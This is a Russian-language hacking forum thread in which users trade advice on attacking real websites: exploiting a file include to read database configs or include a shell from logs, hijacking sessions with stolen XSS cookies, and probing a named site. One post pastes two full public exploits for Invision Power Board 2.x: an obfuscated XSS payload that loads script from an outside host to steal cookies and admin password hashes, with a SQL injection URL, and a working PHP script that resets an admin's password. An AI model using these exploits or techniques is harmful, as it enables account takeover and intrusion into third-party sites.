Даа еслиб я знал как написать уязвимый код , я не программер((( Может подскажите как сделать sql запрос для добавления нового пользователя в базу? или как скрипт уязвимый подписать? или литературку ?
Добавить юзера в БД: Code: mysql --user=root mysql INSERT INTO user VALUES('localhost','monty',PASSWORD('some_pass'), 'Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y'); mysql> INSERT INTO user VALUES('%','monty',PASSWORD('some_pass'), 'Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y'); Подробнее здесь: http://www.phpclub.ru/mysql/doc/adding-users.html
удаленно подключить шелл вроде не выйдет потому что в инклуде у них сначала идет определенный путь а потом уже подставляется параметр include(<путь>/<парам>_blabla.php)
Можно прочитать конфиг коннекта к бд (если она имеется). После чего залогинится с ними для администрирования БД.
Ещё можно попытаться заинклудить шелл - например из картинки(если есть возможность залить) или из логов апача...
нашел my.cnf там указан путь к mysqld.log когда попытался его прочитать получил permission denied то же самое и с сpanel.config там указаны пути к .log файлам но прочесть ни один не смог из-за отсутствия прав
Нет такой функции FarIZ http://forum.antichat.ru/thread23501.html https://forum.antichat.ru/thread22832.html http://forum.antichat.ru/showthread.php?t=23394
Я говорил об php конфиге. Он можен находится не как отдельный файл, а быть вписаным скажем в index.php и т.д.
Для того что бы заюзать удаленый инклуд, необходимо указывать только на шелл в расширении .txt? И второй вопрос: Есть пасивная xss. Куки приходят. После подмены меня просто выкидует из аккаунта. Бывает такое что просто надо не все поля заменять? Или тут ничего не сделаешь?
Нет, ссылку указывают тхт, чтобы кто-то не открыл сам шелл. DrAssault тоже прав... Если идёт привязка по ипу - ничего не сделаешь.
))) инклудят в большинстве случаев именно тхт(можно инклудить хоть мп3), потому что файл с расширением php интерпретируется на удаленном сервере(в большинстве случаев, если не стоит php_flag engine off), а не потому что "кто-то" может открыть шелл.
Так же не стоит забывать что куки временные файлы, возможно что срок действия куков вышел... Какого сервиса куки то? ЗЫ Iceangel_ прав...
а, сорри. когда подключаю индекс то он выполняется т.е. вижу готовую страницу а содержимое index.php прочитать опять же не могу
Есть Code: ----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ] INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION Eugene Minaev [email protected] ___________________________________________________________________ ____/ __ __ _______________________ _______ _______________ \ \ \ / .\ / /_// // / \ \/ __ \ /__/ / / / /_// /\ / / / / /___/ \/ / / / / /\ / / / / / \/ / / / / /__ //\ \ / ____________/ / \/ __________// /__ // / /\\ \_______/ \________________/____/ 2007 /_//_/ // //\ \ \\ // // / .\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / . . \_\\________[________________________________________]_________//_//_/ . . ----[ NITRO ... ] This vulnerability was already found before, but there was no available public "figting" exploit for it. This POC consists of several parts - active xss generator, JS-file, which will be caused at visiting page with xss, log viewer and special component, which will take necessary data from MySQL forum's tables in case if intercepted session belonged to the person with moderator privileges. ----[ ANALYSIS ... ] XSS.php is one of the most important part of IPB 2.1.7 POC package, as it generates xss for future injetion on the forum board. As the reference it is necessary to specify the full way up to ya.js file (in which you have already preliminary corrected way on your own). Most likely it is necessary only to press the button. [img]http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromCharCode(115,99,114, 105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)), head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script) style=visibility:hidden =[/snapback].gif[/img] The injection can be executed only when there is available session of the user with access in moderator's panel.It is necessary to result "starter" parameter to numerical by means of "intval" function.In case of successfull injection there is an oppotunity to enumerate forums' administrators team: index.php?act=mod&f=-6&CODE=prune_finish&pergo=50¤t=50&max=3&starter=1+union+select+1/* ----[ RECORD ... ] { ---IP ADDRESS sniffed ip address ---REFERER xssed theme ---COOKIES xssed cookies of forum member ---USER ID xssed user id of forum member ---ADMIN NAME admin username ---ADMIN PASS admin pass hash ---ADMIN SALT admin hash salt } ----[ PATCH ... ] FILE sources/classes/bbcode/class_bbcode_core.php FUNCTION regex_check_image LINE 924 REPLACE if ( preg_match( "/[?&;]/", $url) ) ON if ( preg_match( "/[?&;\<\[]/", $url) ) FILE sources/classes/bbcode/class_bbcode_core.php FUNCTION post_db_parse_bbcode LINE 486 REPLACE preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match ); ON preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match ); if ( $row['bbcode_tag'] == 'snapback' ) { $match[2][$i] = intval( $match[2][$i] ); } www.underwater.itdefence.ru/isniff.rar www.milw0rm.com/sploits/2008-isniff.rar ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] # milw0rm.com [2008-01-05] Code: <?php /* Debug Mode password change vulnerability Affects Invision Power Borard 2.0.0 to 2.1.7 by Rapigator This works if: "Debug Level" is set to 3 or Enable SQL Debug Mode is turned on In General Configuration of the forum software. */ // The forum's address up to and including 'index.php' $site = "http://localhost/forums/index.php"; // An existing user's login name $name = "admin"; // The new password(3-32 characters) $pass = "1234"; // You can use a proxy... // $proxy = "1.2.3.4:8080"; // ----------------------------- $site .= "?"; $suffix = ""; $name = urlencode($name); $pass = urlencode($pass); $curl = curl_init($site.'act=Reg&CODE=10'); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { $prefix = $regs[1]; $regid = $regs[2]; $regcode = $regs[3]; } else { $suffix = "&debug=1"; $curl = curl_init($site.'act=Reg&CODE=10'.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { $prefix = $regs[1]; $regid = $regs[2]; $regcode = $regs[3]; } } if (!isset($regid) || !isset($regcode)) { echo "Error: Probably not vulnerable, or no forum found"; exit; } $curl = curl_init($site.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}®id={$regid}®_code={$regcode}"); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { change_pass($regcode,$regid,$regs[1],$regs[2]); } if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { change_pass($regcode,$regid,$regs[1],$regs[2]); } function change_pass($regcode,$regid,$vid,$userid) { global $site, $proxy, $name, $pass; $curl = curl_init($site.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}®id={$regid}®_code={$regcode}&pass1={$pass}&pass2={$pass}"); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); echo "Password Changed!"; exit; } ?> # milw0rm.com [2006-11-01] А если ты на щёт патченых форумов - то врятли!
Точно не скажу, ибо после второго запроса мой ip заблочили =/// Но вроде как нет... http://www.la2onix.ru/?act=news&page= Здесь раскрытие путей...